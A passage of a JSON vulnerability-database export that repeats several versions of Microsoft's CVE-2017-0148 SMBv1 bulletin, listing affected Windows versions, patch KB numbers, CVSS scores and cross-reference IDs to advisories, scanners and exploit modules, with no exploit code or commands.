(Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": 
""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T16:50:29", "differentElements": ["msAffectedSoftware"], "edition": 53}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", 
"title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-17T18:44:02", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": 
"symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.3, 
"vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3210721", "KB4013198", "KB3212646", "KB4012216", "KB4012606", "KB4012214", "KB3210720", "KBMS16-110, 3187754", "KB4012213", "KB3205409", "KB4012212", "KB4013429", "KB3177186", "KB4012215", "KB4012217", "KB4012598", "KB3213986", "KB3205401"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for 
x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems 
Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T18:44:02", "differentElements": ["msAffectedSoftware"], "edition": 54}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-17T20:55:04", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": 
["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3210721", "KB4013198", "KB3212646", "KB4012216", "KB4012606", "KB4012214", "KB3210720", "KBMS16-110, 
3187754", "KB4012213", "KB3205409", "KB4012212", "KB4013429", "KB3177186", "KB4012215", "KB4012217", "KB4012598", "KB3213986", "KB3205401"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 
(Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": 
""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": 